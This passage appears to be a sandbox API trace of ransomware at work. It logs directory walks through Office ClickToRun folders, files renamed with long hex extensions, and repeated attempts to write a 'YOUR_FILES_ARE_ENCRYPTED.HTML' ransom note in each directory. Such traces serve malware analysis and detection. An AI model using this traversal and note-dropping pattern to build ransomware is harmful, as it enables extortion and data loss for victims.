ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.606] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x3030f410, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcae746a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x266, dwReserved0=0x0, dwReserved1=0x60, cFileName="DeploymentConfiguration.xml.DEAF24BCDA1C26BB18095BD15DD89C02A02ECD1C2A8022FC475615F6A654C85E", cAlternateFileName="DEPLOY~1.DEA")) returned 1 [0169.606] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml.DEAF24BCDA1C26BB18095BD15DD89C02A02ECD1C2A8022FC475615F6A654C85E") returned 243 [0169.606] lstrcmpW (lpString1="DeploymentConfiguration.xml.DEAF24BCDA1C26BB18095BD15DD89C02A02ECD1C2A8022FC475615F6A654C85E", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.606] PathFindExtensionW (pszPath="DeploymentConfiguration.xml.DEAF24BCDA1C26BB18095BD15DD89C02A02ECD1C2A8022FC475615F6A654C85E") returned=".DEAF24BCDA1C26BB18095BD15DD89C02A02ECD1C2A8022FC475615F6A654C85E" [0169.606] lstrlenW (lpString=".DEAF24BCDA1C26BB18095BD15DD89C02A02ECD1C2A8022FC475615F6A654C85E") returned 65 [0169.606] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f9afd70, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2f9afd70, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb16e220, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x4ad286, dwReserved0=0x0, dwReserved1=0x60, cFileName="Manifest.xml.08D54B76EAF56ADF0302F1E50AE36771095D6B4F128CA564E09045D6359F4E2C", cAlternateFileName="")) returned 1 [0169.606] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml.08D54B76EAF56ADF0302F1E50AE36771095D6B4F128CA564E09045D6359F4E2C") returned 228 [0169.606] lstrcmpW (lpString1="Manifest.xml.08D54B76EAF56ADF0302F1E50AE36771095D6B4F128CA564E09045D6359F4E2C", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.607] PathFindExtensionW (pszPath="Manifest.xml.08D54B76EAF56ADF0302F1E50AE36771095D6B4F128CA564E09045D6359F4E2C") returned=".08D54B76EAF56ADF0302F1E50AE36771095D6B4F128CA564E09045D6359F4E2C" [0169.607] lstrlenW (lpString=".08D54B76EAF56ADF0302F1E50AE36771095D6B4F128CA564E09045D6359F4E2C") returned 65 [0169.607] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3149d650, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x3149d650, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb194380, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x266, dwReserved0=0x0, dwReserved1=0x60, cFileName="UserDeploymentConfiguration.xml.88661BF345C76E09AF0B34C5F4B24A6C67182A64B9D1A7F7B3A0B1E0D5D4DF3F", cAlternateFileName="USERDE~1.886")) returned 1 [0169.607] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml.88661BF345C76E09AF0B34C5F4B24A6C67182A64B9D1A7F7B3A0B1E0D5D4DF3F") returned 247 [0169.609] lstrcmpW (lpString1="UserDeploymentConfiguration.xml.88661BF345C76E09AF0B34C5F4B24A6C67182A64B9D1A7F7B3A0B1E0D5D4DF3F", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.609] PathFindExtensionW (pszPath="UserDeploymentConfiguration.xml.88661BF345C76E09AF0B34C5F4B24A6C67182A64B9D1A7F7B3A0B1E0D5D4DF3F") returned=".88661BF345C76E09AF0B34C5F4B24A6C67182A64B9D1A7F7B3A0B1E0D5D4DF3F" [0169.609] lstrlenW (lpString=".88661BF345C76E09AF0B34C5F4B24A6C67182A64B9D1A7F7B3A0B1E0D5D4DF3F") returned 65 [0169.609] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x312ae470, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x312ae470, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb278bc0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x2ef2ef, dwReserved0=0x0, dwReserved1=0x60, cFileName="UserManifest.xml.12AEB737F53DF5206D67A88FC31DBB80F6DFA37803B629D2CBC6E144026E586B", cAlternateFileName="USERMA~1.12A")) returned 1 [0169.609] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml.12AEB737F53DF5206D67A88FC31DBB80F6DFA37803B629D2CBC6E144026E586B") returned 232 [0169.609] lstrcmpW (lpString1="UserManifest.xml.12AEB737F53DF5206D67A88FC31DBB80F6DFA37803B629D2CBC6E144026E586B", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.609] PathFindExtensionW (pszPath="UserManifest.xml.12AEB737F53DF5206D67A88FC31DBB80F6DFA37803B629D2CBC6E144026E586B") returned=".12AEB737F53DF5206D67A88FC31DBB80F6DFA37803B629D2CBC6E144026E586B" [0169.609] lstrlenW (lpString=".12AEB737F53DF5206D67A88FC31DBB80F6DFA37803B629D2CBC6E144026E586B") returned 65 [0169.609] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb278bc0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcb278bc0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb278bc0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.609] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 180 [0169.609] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.609] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb278bc0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcb278bc0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb278bc0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.609] FindClose (in: hFindFile=0x42f32c0 | out: hFindFile=0x42f32c0) returned 1 [0169.609] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 180 [0169.610] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.610] GetProcessHeap () returned 0x270000 [0169.610] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0169.611] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb278bc0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb278bc0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{1A8308C7-90D1-4200-B16E-646F163A08E8}", cAlternateFileName="{1A830~1")) returned 0 [0169.611] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0169.611] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 141 [0169.611] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.611] GetProcessHeap () returned 0x270000 [0169.612] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0169.612] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb278bc0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb278bc0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{9AC08E99-230B-47E8-9721-4577B7F124EA}", cAlternateFileName="{9AC08~1")) returned 0 [0169.612] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0169.612] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 102 [0169.612] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.612] GetProcessHeap () returned 0x270000 [0169.613] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0169.613] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb29ed20, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcb29ed20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb29ed20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.613] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 93 [0169.613] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.613] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb29ed20, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcb29ed20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb29ed20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.613] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0169.613] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 93 [0169.613] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.613] GetProcessHeap () returned 0x270000 [0169.614] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0169.618] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x312ae470, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb2c4e80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb2c4e80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Integration", cAlternateFileName="INTEGR~1")) returned 1 [0169.618] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration") returned 67 [0169.618] GetProcessHeap () returned 0x270000 [0169.619] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0169.620] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration" [0169.620] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\*" [0169.620] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x312ae470, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb2c4e80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb2c4e80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0169.620] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x312ae470, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb2c4e80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb2c4e80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.621] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x312ae470, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb29ed20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb29ed20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ShortcutBackups", cAlternateFileName="SHORTC~1")) returned 1 [0169.621] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups") returned 83 [0169.621] GetProcessHeap () returned 0x270000 [0169.621] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0169.623] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups" [0169.623] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\*" [0169.623] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x312ae470, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb29ed20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb29ed20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0169.623] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x312ae470, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb29ed20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb29ed20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.623] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb29ed20, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcb29ed20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb2c4e80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.623] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0169.623] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.623] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb29ed20, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcb29ed20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb2c4e80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.623] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0169.623] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0169.623] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.624] GetProcessHeap () returned 0x270000 [0169.624] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0169.624] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb2c4e80, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcb2c4e80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb2c4e80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.624] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 97 [0169.624] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.624] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb2c4e80, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcb2c4e80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb2c4e80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.625] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0169.625] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 97 [0169.625] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.625] GetProcessHeap () returned 0x270000 [0169.625] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0169.625] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb2c4e80, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcb2c4e80, 